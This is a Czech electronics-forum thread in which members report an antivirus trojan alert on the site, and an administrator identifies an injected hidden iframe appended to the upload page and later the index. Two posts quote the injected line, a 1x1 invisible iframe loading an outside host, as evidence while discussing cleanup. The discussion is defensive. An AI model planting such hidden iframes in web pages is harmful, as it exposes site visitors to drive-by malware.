Trojskej kun
Moderátor: Moderátoři
Trojskej kun
Klepnul jsem na upload a pc mi ohlasil trojskeho kone
mam NOD32
mam NOD32
Už o tom byla zmínka tady: http://www.ebastlirna.cz/modules.php?na ... ght=#80322
A koukám, že se to ještě nevyřešilo
A koukám, že se to ještě nevyřešilo
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
Už to vidím, je to na konci stránky nekorektně přilepený za /html -někdo to přidal do php kódu, co generuje stránku uploadu. Použil zřejmě script, co přidá cokoliv na konec souboru.
Je potřeba to ručně otevřít na serveru a smazat.
Vám, co to hlásí virus, máte předpokládám jako prohlížeč IE ?
Kód: Vybrat vše
iframe src='http://zaebiz.awardspace.com' width='1' height='1' style='visibility: hidden;'></iframe>
Vám, co to hlásí virus, máte předpokládám jako prohlížeč IE ?
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
Já mám taky FF a jelikož předpokládám, že se chová korektně, tak všechno za koncovou značkou html ignoruje. Navíc antivir mlčí a žádný nový port se mě neotevřel ani se neobjevil nový proces "na pozadí".
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
No - a teď ten blbec už rozvrtal i hlavní index a kdoví co ješte.
Myslím si, že pokud hlavní admin nemá čas se o fórum starat, tak má předat heslo od FTP a ostatní někomu, kdo na to čas má a taky občas zalátá nějakou tu bezpečnostní díru. Zatím se to nestalo ani u té staré.
Až spadne i databáze, bude celá bastlírna víte kde !
Myslím si, že pokud hlavní admin nemá čas se o fórum starat, tak má předat heslo od FTP a ostatní někomu, kdo na to čas má a taky občas zalátá nějakou tu bezpečnostní díru. Zatím se to nestalo ani u té staré.
Až spadne i databáze, bude celá bastlírna víte kde !
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
po připojení na domovskou stránku Bastlírny mám ve zdrojovém kódu stránky
<!-- ~ --><iframe src='http://zaebiz.freehostia.com' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->
něco tu zapáchá...
<!-- ~ --><iframe src='http://zaebiz.freehostia.com' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->
něco tu zapáchá...
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
napřed by to chtělo ho identifikovat, to snad nebude pro admina nemožné.ZdenekHQ píše:No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
Pak zveřejnit a nakonec uspořádat trestnou výpravu.
Rád věnuju kastrovací nožík